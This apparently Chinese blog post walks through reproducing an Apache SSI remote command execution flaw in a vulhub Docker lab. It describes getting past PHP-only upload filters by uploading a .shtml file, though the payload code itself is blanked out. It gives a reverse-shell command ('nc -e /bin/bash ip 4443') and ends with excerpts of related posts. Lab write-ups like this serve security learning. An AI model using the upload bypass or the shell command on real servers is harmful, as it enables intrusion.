Apache SSI 遠端命令執行漏洞 漏洞復現

2022-09-13 21:27:29 字數 951 閱讀 4540

如果目標伺服器開啟了ssi功能,那麼shtml檔案將可以執行任意命令。如果上傳檔案程式限制了php檔案的上傳,且沒有限制shtml檔案上傳,我們可以上傳乙個shtml檔案,並利用語法執行任意命令。

ssi詳細講解請參考:什麼是ssi。

ssi漏洞挖掘思路請參考:注入漏洞。

該環境使用vulhub搭建,該漏洞路徑為vulhub/httpd/ssi-rce。進入該漏洞路徑後執行以下命令:

docker-compose up -d
-d 表示後台執行。

注意:該命令必須在漏洞目錄下執行,該命令是啟動當前目錄下的docker容器。

如果不會搭建環境可以參考官方文件:

將**寫入檔案a.shtml中,然後上傳之伺服器。

然後點選超連結a.shtml即可開啟上傳檔案,並執行id命令。

也可將中的id改成其他命令,例如nc -e /bin/bash ip 4443**乙個shell。但是要注意的是這個docker容器中沒有nc,所以在這個靶機中**shell不會成功。

[1] 什麼是ssi。

[2] 注入漏洞。

Apache SSI 遠端命令執行漏洞

漏洞分析 漏洞復現之前,要知道ssi是什麼,那麼ssi是什麼呢?ssi 即server side includes ssi提供了一種對現有html文件增加動態內容的方法,不需要編寫複雜的jsp php asp等程式或者呼叫cgi程式。因為是docker拉取的環境,可能和自己搭建的環境有出入,本人找的...

Apache SSI 遠端命令執行漏洞

在測試任意檔案上傳漏洞的時候,目標服務端可能不允許上傳php字尾的檔案。如果目標伺服器開啟了ssi與cgi支援,我們可以上傳乙個shtml檔案,並利用語法執行任意命令。參考 路徑 vulhub httpd ssi rce 啟動乙個支援ssi與cgi的apache伺服器 docker compose ...

Apache SSI 遠端命令執行漏洞

好好學習,天天向上 在測試任意檔案上傳漏洞的時候,目標服務端可能不允許上傳php字尾的檔案。如果目標伺服器開啟了ssi與cgi支援,我們可以上傳乙個shtml檔案,並利用 語法執行任意命令。這裡使用2.4.38版本 使用vulhub 使用docker啟動 docker compose build d...